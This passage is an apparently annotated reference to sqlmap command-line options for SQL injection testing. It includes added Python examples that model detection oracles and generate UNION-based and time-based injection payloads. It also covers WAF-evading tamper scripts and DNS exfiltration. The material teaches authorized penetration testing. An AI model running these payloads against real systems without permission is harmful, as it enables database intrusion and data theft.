4. Optimization
-o  Turn on all optimization switches (equivalent to --predict-output, --keep-alive and --null-connection together; it does not raise --threads)
--predict-output  Predict common query output: sqlmap consults its statistics of common values (table and column names, user names, etc.) before falling back to character-by-character inference. Not compatible with --threads
--keep-alive  Use persistent HTTP(s) connections. Not compatible with --proxy
--null-connection  Retrieve the page length without the actual HTTP response body (via HEAD or Range requests). Saves bandwidth in boolean-based blind injection, where only the response size is compared
--threads=THREADS  Max number of concurrent HTTP(s) requests (default 1). sqlmap caps this at 10 by default; more threads also make the scan noisier and easier to spot in server logs
5. Injection
-p TESTPARAMETER  Testable parameter(s), comma-separated. Forces sqlmap to test these even if it does not consider them dynamic
--skip=SKIP  Skip testing for the given parameter(s)
--skip-static  Skip testing parameters that do not appear to be dynamic
--param-exclude=..  Regexp matched against parameter names to exclude them from testing (e.g. "ses" to leave session parameters alone)
--param-filter=P..  Select testable parameter(s) by place (e.g. "POST", "GET", "Cookie")
--dbms=DBMS  Force the back-end DBMS to the provided value, skipping fingerprinting (e.g. "MySQL", "PostgreSQL", "Microsoft SQL Server")
--dbms-cred=DBMS..  DBMS authentication credentials (user:password) for techniques that need to authenticate to the database directly
--os=OS  Force the back-end DBMS operating system to the provided value
--invalid-bignum  Use big numbers for invalidating the original parameter value. By default sqlmap negates a numeric value (id=1 becomes id=-1) so that the original row disappears and, e.g., a UNION row is rendered instead
--invalid-logical  Use logical operations for invalidating values (id=1 becomes id=1 AND 17=18)
--invalid-string  Use random strings for invalidating values
--no-cast  Turn off the payload casting mechanism (sqlmap normally wraps retrieved values in CAST/conversion expressions so they come back as strings; older DBMS versions may choke on this)
--no-escape  Turn off the string escaping mechanism (sqlmap normally replaces string literals with CHAR()/hex constructs so no quote characters are needed; turn it off when those constructs are what the filter blocks)
--prefix=PREFIX  Injection payload prefix string (e.g. "')" to close the quote and parenthesis the value sits in)
--suffix=SUFFIX  Injection payload suffix string (e.g. "-- -" to comment out the rest of the original query)
--tamper=TAMPER  Use the given script(s) from sqlmap's tamper/ directory, comma-separated, to rewrite the injected payload before sending, typically to evade a WAF or input filter
6. Detection
--level=LEVEL  Level of tests to perform (1-5, default 1). Higher levels add more payloads and more injection points: level 2 also tests HTTP Cookie values, level 3 the User-Agent and Referer headers, level 5 the Host header
--risk=RISK  Risk of tests to perform (1-3, default 1). Risk 2 adds heavy time-based queries; risk 3 adds OR-based boolean tests, which can modify or delete data if the injectable statement is an UPDATE or DELETE
--string=STRING  String that is present in the page when the injected query evaluates to True
--not-string=NOT..  String that is present in the page when the injected query evaluates to False
--regexp=REGEXP  Regexp that matches the page when the injected query evaluates to True
--code=CODE  HTTP status code returned when the injected query evaluates to True
--smart  Perform thorough tests only on parameters for which a positive heuristic (e.g. a DBMS error message in the response) was observed
--text-only  Compare pages based only on their textual content (HTML tags stripped), so that dynamic markup such as tokens and timestamps does not produce false differences
--titles  Compare pages based only on their <title> element
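The four explicit oracles (--string, --not-string, --regexp, --code) exist because sqlmap's default decision, comparing each response to the original page by similarity, breaks down on pages that contain dynamic content. The following added example (not sqlmap's own comparison code; the threshold constant is taken from sqlmap's settings, everything else, including the three constructed pages, is illustrative) shows why: a rotating CSRF token makes the raw comparison call an identical result "different", --text-only fixes that, and --titles is too coarse when the title never changes.

```python
"""
Simplified model of how sqlmap's Detection options turn a response into a
True/False answer for boolean-based blind injection. Added example; not
sqlmap's own code.
"""
import difflib
import re
from html import unescape

# sqlmap considers two pages "the same" when their similarity ratio is at
# least this value (UPPER_RATIO_BOUND in sqlmap's lib/core/settings.py).
UPPER_RATIO_BOUND = 0.98

TAG_RE = re.compile(r"<[^>]+>")
TITLE_RE = re.compile(r"<title[^>]*>(.*?)</title>", re.I | re.S)

# Constructed sample pages. The "csrf" token changes on every request,
# which is exactly the kind of noise the comparison has to survive.
ORIGINAL_PAGE = (
    '<html><head><title>Products</title></head><body>\n'
    '<input type="hidden" name="csrf" value="01234567890123456789012345678901">\n'
    '<h1>Product 1</h1><p>Laptop, 13 inch</p></body></html>'
)
TRUE_PAGE = (  # same content as the original, new token (query evaluated to True)
    '<html><head><title>Products</title></head><body>\n'
    '<input type="hidden" name="csrf" value="abcdefabcdefabcdefabcdefabcdefab">\n'
    '<h1>Product 1</h1><p>Laptop, 13 inch</p></body></html>'
)
FALSE_PAGE = (  # the row disappeared (query evaluated to False)
    '<html><head><title>Products</title></head><body>\n'
    '<input type="hidden" name="csrf" value="fedcbafedcbafedcbafedcbafedcbafe">\n'
    '<p>No results</p></body></html>'
)


def text_only(html):
    """The --text-only view: tags stripped, entities decoded, whitespace collapsed."""
    return " ".join(unescape(TAG_RE.sub(" ", html)).split())


def title_only(html):
    """The --titles view: just the <title> text, or '' if there is none."""
    m = TITLE_RE.search(html)
    return m.group(1).strip() if m else ""


def similarity(original, current, use_text_only=False, use_titles=False):
    """Similarity ratio (0..1) between the original and the current page."""
    if use_titles:
        original, current = title_only(original), title_only(current)
    elif use_text_only:
        original, current = text_only(original), text_only(current)
    return difflib.SequenceMatcher(None, original, current).ratio()


def query_is_true(original, current, status=200, string=None, not_string=None,
                  regexp=None, code=None, use_text_only=False, use_titles=False):
    """Decide whether the injected query evaluated to True.

    An explicit oracle (--code, --string, --not-string, --regexp) wins over
    the fuzzy page comparison when one is given.
    """
    if code is not None:
        return status == code
    if string is not None:
        return string in current
    if not_string is not None:
        return not_string not in current
    if regexp is not None:
        return re.search(regexp, current) is not None
    return similarity(original, current, use_text_only, use_titles) >= UPPER_RATIO_BOUND


if __name__ == "__main__":
    print("raw ratio, identical content but new token:",
          round(similarity(ORIGINAL_PAGE, TRUE_PAGE), 3))
    print("--text-only ratio:", similarity(ORIGINAL_PAGE, TRUE_PAGE, use_text_only=True))
    print("--titles ratio against the False page:",
          similarity(ORIGINAL_PAGE, FALSE_PAGE, use_titles=True))
```

When a scan reports a parameter as "not injectable" on a page with per-request tokens, timestamps or view counters, retry with --text-only, or pick a --string / --not-string that only the True or False page contains, before concluding there is nothing there.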
7. Techniques
--technique=TECH..  SQL injection techniques to use (default "BEUSTQ": B boolean-based blind, E error-based, U UNION query, S stacked queries, T time-based blind, Q inline queries). Restrict this, e.g. --technique=BEU, to avoid slow time-based probes or stacked queries you do not need
--time-sec=TIMESEC  Seconds the DBMS is asked to delay its response in time-based blind probes (default 5). Raise it on slow or jittery links to avoid false positives
--union-cols=UCOLS  Range of column counts to try for UNION query SQL injection (e.g. "12-16"). By default sqlmap tries 1 to 10 columns; a higher --level widens the range
--union-char=UCHAR  Character or value to use in the SELECT list while brute-forcing the number of columns (default NULL; some applications only render the page when a number such as 123 is used)
--union-from=UFROM  Table to use in the FROM part of the UNION query (needed where a bare SELECT is invalid, e.g. FROM DUAL on Oracle, or a real table on Microsoft Access)
--dns-domain=DNS..  Domain name used for the DNS exfiltration attack. The domain's NS records must point at the machine running sqlmap, which has to be able to bind UDP port 53
--second-url=SEC..  URL of the page where the result of a second-order injection is searched for (the payload is stored by one request and rendered by another)
--second-req=SEC..  Load the second-order HTTP request from a file (raw request format) instead of giving a URL
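To see how the UNION-related options above combine with --prefix, --suffix and the --invalid-* switches from the Injection section, here is an added example that models the layout of the probes sqlmap sends. It is not sqlmap's own agent code: the function names, the fixed "UNION ALL SELECT" shape and the three time-based payload templates are illustrative, and sqlmap itself chooses prefix/suffix boundaries and random numbers dynamically.

```python
"""
Model of how --union-cols, --union-char, --union-from, --prefix, --suffix,
--invalid-* and --time-sec shape injection probes. Added example; not
sqlmap's own code.
"""
import random
import string


def invalidate(value, mode="negative", rng=None):
    """Replace the original parameter value so its row no longer matches.

    For UNION injection the original row has to vanish, otherwise the page
    renders it instead of the attacker-controlled UNION row.
    """
    rng = rng or random.Random(1)
    if mode == "negative":      # sqlmap's default for numeric values: id=1 -> id=-1
        return "-" + value
    if mode == "bignum":        # --invalid-bignum: an id far outside the real range
        return str(rng.randint(10**8, 10**9 - 1))
    if mode == "logical":       # --invalid-logical: keep the value, AND a false condition
        n = rng.randint(1000, 9999)
        return "%s AND %d=%d" % (value, n, n + 1)
    if mode == "string":        # --invalid-string: a random word where a number was expected
        return "".join(rng.choice(string.ascii_letters) for _ in range(rng.randint(4, 8)))
    raise ValueError("unknown invalidation mode: %r" % mode)


def parse_union_cols(spec):
    """--union-cols takes a single count ('12') or an inclusive range ('10-20')."""
    lo, _, hi = spec.partition("-")
    lo, hi = int(lo), (int(hi) if hi else int(lo))
    if lo < 1 or hi < lo:
        raise ValueError("bad --union-cols range: %r" % spec)
    return lo, hi


def union_probe(value, cols, char="NULL", from_table=None,
                prefix="", suffix="-- -", invalid="negative"):
    """One column-count probe:
    <invalidated value><prefix> UNION ALL SELECT <char>,...[ FROM <table>]<suffix>
    """
    select_list = ",".join([char] * cols)
    payload = "%s%s UNION ALL SELECT %s" % (invalidate(value, invalid), prefix, select_list)
    if from_table:
        payload += " FROM " + from_table
    return payload + suffix


def union_probes(value, union_cols="1-10", **options):
    """All probes for a --union-cols range, in the order they would be sent."""
    lo, hi = parse_union_cols(union_cols)
    return [union_probe(value, n, **options) for n in range(lo, hi + 1)]


def time_probe(value, dbms, time_sec=5):
    """Time-based blind probe; --time-sec is the delay the DBMS is asked for."""
    dbms = dbms.lower()
    if dbms == "mysql":
        return "%s AND SLEEP(%d)" % (value, time_sec)
    if dbms == "postgresql":
        return "%s AND 1=(SELECT 1 FROM PG_SLEEP(%d))" % (value, time_sec)
    if dbms in ("mssql", "microsoft sql server"):   # needs stacked queries (technique S)
        return "%s; WAITFOR DELAY '0:0:%d'--" % (value, time_sec)
    raise ValueError("no time-based template for DBMS %r" % dbms)


if __name__ == "__main__":
    # Oracle-style target: value sits inside single quotes, bare SELECT is invalid
    for probe in union_probes("1", "1-3", prefix="'", suffix="-- -", from_table="DUAL"):
        print(probe)
    print(union_probe("1", 2, char="123", invalid="bignum"))
    print(time_probe("1", "MySQL", 10))
```

Reading the probes this way also explains two common failures: a wrong --prefix/--suffix pair leaves the original quote or parenthesis unbalanced, so every column count fails the same way, and forgetting --union-from on Oracle produces syntactically invalid SELECTs regardless of the column count.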